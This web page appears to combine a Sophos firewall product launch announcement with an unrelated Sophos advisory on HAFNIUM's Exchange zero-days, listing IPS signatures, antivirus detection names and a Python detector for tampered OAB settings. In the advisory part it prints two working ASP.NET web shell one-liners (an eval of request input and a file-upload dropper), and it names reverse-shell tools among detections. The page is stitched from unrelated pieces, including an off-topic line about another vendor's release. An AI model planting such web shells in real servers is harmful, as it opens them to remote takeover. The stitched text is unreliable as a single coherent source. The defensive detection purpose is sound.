Sophos Antivirus Firewall




Today we’re announcing a brand-new range of hardware appliances for Sophos Firewall OS, the XGS Series. This is not just a technology refresh; our firewall appliances have been completely reengineered and now come with a dual processor architecture to deliver a significant performance increase over previous models.

The new XGS Series appliances release with Sophos Firewall OS v18.5, have a new simplified licensing scheme, and as if that wasn’t enough, we’re also changing the overall product name from Sophos XG Firewall to Sophos Firewall.

Indeed the Release Notes show Sophos Endpoint Firewall 1.0.0 since Endpoint Central 11.5.5 with the text "The new endpoint firewall component supports the management of Windows Firewall." According to the What's new, this is available since July.

Sophos Firewall’s Xstream Protection Bundle provides all the next-gen protection, performance, and value you need to power the most demanding network. Base License: networking, wireless, Xstream Architecture, unlimited remote access VPN, site-to-site VPN, reporting.

NOTE: The Sophos XG Free Home Use firewall contains its own operating system and will overwrite all data on the computer during the installation process. Therefore, a separate, dedicated computer is needed, which will change into a fully functional security appliance. Just right for the spare PC you have sitting in the corner!

See how Sophos Endpoint, Sophos XG Firewall, and Sophos Encryption systematically work together to stop a ransomware attack. How to Get Synchronized Security: to enable Synchronized Security, all you need is two or more Sophos products that work together. At least one product must be managed through the Sophos Central management platform.

Dual Processor Architecture

Every XGS Series appliance combines a multi-core x86 CPU with a dedicated Xstream Flow Processor for application acceleration. Xstream Flow Processors are Network Processing Units (NPUs) which now add a hardware layer FastPath to extend the Xstream architecture that we introduced in SFOS version 18.

Flexible to the core

One benefit of the hardware platform that we’ve chosen, is that our Xstream Flow Processors are programmable. This allows us to extend the offload capabilities in future software releases, providing additional performance improvements, even for things like crypto processes. This, combined with the ability to modify and extend connectivity on every appliance, delivers a truly future-proof solution which can adapt as the network, workforce and security infrastructure evolves.

Protection and Performance

The increase in performance varies by model and test but you’re likely to see at least a 2X performance increase over v18 running on XG Series hardware and numbers to meet or beat our key competitors on the all-important Price per Protected Mbps. The additional performance headroom allows customers to turn on essential protection, such as TLS Inspection, with the confidence that they’re removing a huge blind spot in their network visibility – which hackers are increasingly exploiting – whilst maintaining their network performance.

Sophos Firewall OS v18.5

The new appliances come with the latest v18.5 software release which not only provides support for the new hardware, but also includes all the 18.x maintenance releases since the v18 release with extensive security hardening features, VPN and SD-WAN enhancements, Central Management and Reporting capabilities, and many more improvements.


Note: 18.5 for all non-XGS Series customers is currently expected to be available in June.

Product naming and availability

The XGS Series model line-up is similar to what we offer with the XG Series:

  • Desktop model numbers have been increased by ‘1’
  • 1U and 2U rackmount model numbers have an added ‘0’

We’re launching all models over a period of about four to six weeks. All XGS Desktop and 1U 2xxx and 3xxx models are available from today, April 21st and the XGS 1U 4xxx and 2U models will be available from late May.

As actual availability can vary by model and region, please reach out to your local Sophos or distribution team for further details.

The XG Series models remain available for purchase.

Where to get more information

You can access all the updated resources for the Sophos Firewall and XGS Series launch, including a What’s New video, on the Partner Portal.

The web updates on sophos.com will be live in all core languages by 9am EDT/3pm CEST. The key pages for you to bookmark are sophos.com/firewall for the new main Sophos Firewall page and sophos.com/compare-xgs for the tech specs and details on the XGS Series.


A recording of the full launch SophSkills is available on the Partner Portal.

We wish you great success selling Sophos Firewall and the XGS Series and look forward to welcoming you to further webinars and events in the coming weeks.

Four new zero-day vulnerabilities affecting Microsoft Exchange are being actively exploited in the wild by HAFNIUM, a threat actor believed to be a nation state.

Anyone running on-premises Exchange Servers should patch them without delay, and search their networks for indicators of attack.

Sophos protections against HAFNIUM

Sophos MTR, network and endpoint security customers benefit from multiple protections against the exploitation of the new vulnerabilities.

Sophos MTR

The Sophos MTR team has been monitoring our customer environments for behaviors associated with these vulnerabilities since their announcement. If we identify any malicious activity related to these vulnerabilities, we will create a case and be in touch with you directly.

Sophos Firewall

IPS signatures for customers running SFOS and XFOS:

CVE             SID
CVE-2021-26855  57241, 57242, 57243, 57244, 2305106, 2305107
CVE-2021-26857  57233, 57234
CVE-2021-26858  57245, 57246
CVE-2021-27065  57245, 57246

These signatures are also present on the Endpoint IPS in Intercept X Advanced.

IPS signatures for customers running Sophos UTM:

CVE             SID
CVE-2021-26855  57241, 57242, 57243, 57244
CVE-2021-26857  57233, 57234
CVE-2021-26858  57245, 57246
CVE-2021-27065  57245, 57246

If you see these detection names on your networks you should investigate further and remediate.

Sophos Intercept X Advanced and Sophos Antivirus (SAV)

Customers can monitor the following AV signatures to identify potential HAFNIUM attacks:

Web shell related

  • Troj/WebShel-L
  • Troj/WebShel-M
  • Troj/WebShel-N
  • Troj/ASPDoor-T
  • Troj/ASPDoor-U
  • Troj/ASPDoor-V
  • Troj/AspScChk-A
  • Troj/Bckdr-RXD
  • Troj/WebShel-O
  • Troj/WebShel-P

Other payloads

  • Mal/Chopper-A
  • Mal/Chopper-B
  • ATK/Pivot-B
  • AMSI/PowerCat-A (Powercat)
  • AMSI/PSRev-A (Invoke-PowerShellTcpOneLine reverse shell)

Due to the dynamic nature of the web shells, the shells are blocked but need to be removed manually. If you see these detection names on your networks you should investigate further and remediate.

We have also blocked relevant C2 IP destinations, where it was safe to do so.

In addition, the “lsass dump” stages of the attack are blocked by the credential protection (CredGuard) included in all Intercept X Advanced subscriptions.

Sophos EDR

Sophos EDR customers can leverage pre-prepared queries to identify potential web shells for investigation:

When reviewing the potential web shells identified by the queries, the web shell will typically appear inside an Exchange Offline Address Book (OAB) configuration file, in the ExternalUrl field. E.g.

ExternalUrl : http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["key-here"],"unsafe");}</script>

ExternalUrl : http://g/<script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath("error.aspx"));}}</script>
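As an added example (not part of the original post or a Sophos tool), the following check scans Format-List style output of the OAB virtual directory settings and flags any ExternalUrl value that contains server-side script markup or is not a plausible http(s) URL, which is the pattern the two entries above show. The sample output is constructed for illustration and the field name ExternalUrl is the one named in the text.

```python
import re
from urllib.parse import urlparse

# Constructed sample of "Get-OabVirtualDirectory | fl ExternalUrl" output.
# The two malformed values mirror the web shell entries described above.
SAMPLE_OUTPUT = """\
ExternalUrl : https://mail.example.com/OAB
ExternalUrl : http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["key-here"],"unsafe");}</script>
ExternalUrl :
ExternalUrl : http://g/<script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath("error.aspx"));}}</script>
"""

# Tokens that never belong in a URL field but do appear in ASP.NET web shells.
SUSPICIOUS = re.compile(r"<script|runat\s*=|Page_Load|eval\(|\.SaveAs\(", re.IGNORECASE)


def parse_external_urls(text):
    """Extract every ExternalUrl value from Format-List style output (empty values kept)."""
    values = []
    for line in text.splitlines():
        m = re.match(r"^\s*ExternalUrl\s*:\s*(.*)$", line)
        if m:
            values.append(m.group(1).strip())
    return values


def classify_external_url(value):
    """Return (verdict, reason): 'ok' for an empty or well-formed URL, else 'suspicious'."""
    if value == "":
        return ("ok", "empty (no external URL configured)")
    if SUSPICIOUS.search(value):
        return ("suspicious", "script markup inside URL field")
    u = urlparse(value)
    if u.scheme not in ("http", "https") or not u.netloc:
        return ("suspicious", "not a plausible http(s) URL")
    if any(ch in value for ch in "<>\"'{}"):
        return ("suspicious", "characters illegal in a URL")
    return ("ok", "well-formed URL")


def find_suspicious(text):
    """Return [(value, reason)] for every ExternalUrl that should be investigated."""
    hits = []
    for value in parse_external_urls(text):
        verdict, reason = classify_external_url(value)
        if verdict == "suspicious":
            hits.append((value, reason))
    return hits


if __name__ == "__main__":
    for value, reason in find_suspicious(SAMPLE_OUTPUT):
        print(f"INVESTIGATE ({reason}): {value[:60]}...")
```

Flagged entries should be treated as indicators of compromise and handled per the remediation guidance above; the blocked shell still has to be removed manually.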


Identifying signs of compromise

The Sophos MTR team has published a step-by-step guide on how to search your network for signs of compromise.

DearCry ransomware

The actors behind DearCry ransomware are using the same vulnerabilities as the Hafnium group in their attacks. Sophos Intercept X detects and blocks DearCry via:

  • Troj/Ransom-GFE
  • CryptoGuard

Editor note: Post updated with addition of IPS signatures for Sophos UTM and additional detections. 2021-03-10 08:35 UTC

Editor note: Post updated with additional anti-malware signatures for Intercept X and Sophos Antivirus (SAV) 2021-03-11 14:30 UTC


Editor note: Post updated to advise that signatures are now present on the Endpoint IPS, and the addition of two further AV signatures 2021-03-12 09:10 UTC


Editor note: Post updated with DearCry ransomware detections 2021-03-12 16:30 UTC